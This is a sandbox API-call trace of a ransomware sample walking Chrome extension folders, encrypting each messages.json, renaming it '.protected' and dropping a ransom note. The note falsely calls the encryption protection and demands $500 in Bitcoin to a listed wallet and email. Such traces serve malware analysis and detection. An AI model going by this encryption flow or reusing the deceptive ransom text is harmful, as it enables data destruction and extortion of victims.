[0080.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\.") returned 143 [0080.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.525] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.525] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.525] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.525] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.525] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\..") returned 144 [0080.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.525] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0080.525] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.525] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0080.526] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0080.526] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0080.526] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.526] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x299, lpOverlapped=0x0) returned 1 [0080.527] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.527] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x299, lpOverlapped=0x0) returned 1 [0080.527] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.527] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.527] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.527] CloseHandle (hObject=0x168) returned 1 [0080.527] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.protected") returned 165 [0080.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.protected")) returned 1 [0080.528] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.528] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.528] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\RESTORE_FILES.txt") returned 159 [0080.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.529] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.529] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.529] lstrlenA (lpString="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") returned 684 [0080.529] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.529] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.529] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.530] CloseHandle (hObject=0x164) returned 1 [0080.530] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.530] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0080.530] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0080.530] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0080.530] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0080.530] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0080.530] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id") returned 141 [0080.530] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0080.530] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0080.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\*") returned 143 [0080.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.530] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.530] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.530] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.530] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.530] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\.") returned 143 [0080.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.530] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.530] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.530] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.530] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.530] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.530] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\..") returned 144 [0080.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.530] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") 
returned 155 [0080.531] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.531] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.531] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.531] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.534] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") returned 155 [0080.534] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.534] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") returned 155 [0080.534] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.534] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") returned 155 [0080.534] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.534] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.535] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.535] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.535] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.535] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.535] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.535] CloseHandle (hObject=0x168) returned 1 [0080.535] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.protected") returned 165 [0080.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.protected")) returned 1 [0080.536] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.536] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.536] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0080.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.536] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.536] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.537] lstrlenA (lpString="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") returned 684 [0080.537] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.537] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.537] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.537] CloseHandle (hObject=0x164) returned 1 [0080.537] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.537] lstrcmpiW (lpString1="is", lpString2="Windows") returned -1 [0080.537] lstrcmpiW (lpString1="is", lpString2="Program Files") returned -1 [0080.537] lstrcmpiW (lpString1="is", lpString2="Program Files (x86)") returned -1 [0080.537] lstrcmpiW (lpString1="is", lpString2="$Recycle.bin") returned 1 [0080.537] lstrcmpiW (lpString1="is", lpString2="System Volume Information") returned -1 [0080.537] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is") returned 141 [0080.537] lstrcmpW (lpString1="is", lpString2=".") returned 1 [0080.537] lstrcmpW (lpString1="is", lpString2="..") returned 1 [0080.537] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\*") returned 143 [0080.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.538] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.538] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.538] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.538] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.538] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.538] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\.") returned 143 [0080.538] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.538] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.538] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.538] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.538] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.538] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.538] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.538] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\..") returned 144 [0080.538] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.538] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.538] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.538] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") 
